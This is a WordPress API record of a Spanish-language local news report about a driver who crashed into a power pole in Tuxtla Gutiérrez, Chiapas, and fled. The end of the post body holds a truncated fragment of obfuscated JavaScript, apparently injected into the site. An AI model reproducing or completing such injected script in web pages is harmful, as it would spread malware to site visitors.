{"id":19947,"date":"2025-01-21T05:38:26","date_gmt":"2025-01-21T05:38:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19947"},"modified":"2025-01-21T05:38:27","modified_gmt":"2025-01-21T05:38:27","slug":"conductor-choca-y-abandona-su-vehiculo-en-el-vergel","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19947","title":{"rendered":"Conductor choca y abandona su veh\u00edculo en El Vergel"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250120-WA0032-1024x768.jpg\" alt=\"\" class=\"wp-image-19948\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250120-WA0032-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250120-WA0032-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250120-WA0032-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250120-WA0032-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250120-WA0032-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>20 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este lunes el conductor de un Vw Polo de color gris choc\u00f3 sobre la Calzada Ignacio Zaragoza y la entrada del Fraccionamiento El Vergel de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el chofer circulaba a exceso de velocidad y se qued\u00f3 dormido lo que provoc\u00f3 que se fuera contra un poste de la CFE.<\/p>\n\n\n\n<p>Por el golpe el poste qued\u00f3 parcialmente da\u00f1ado lo que ocasion\u00f3 que varias casas se quedaran sin energ\u00eda el\u00e9ctrica.<\/p>\n\n\n\n<p>Al lugar arribaron elementos polic\u00edacos pero el conductor ya hab\u00eda escapado.<\/p>\n\n\n\n<p>Finalmente la unidad fue remolcada a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. 20 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este lunes el conductor de un Vw Polo de color gris choc\u00f3 sobre la Calzada Ignacio Zaragoza y la entrada del Fraccionamiento El Vergel de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el chofer circulaba a exceso de velocidad y se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19948,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19947","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19947"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19947\/revisions"}],"predecessor-version":[{"id":19949,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19947\/revisions\/19949"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19948"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}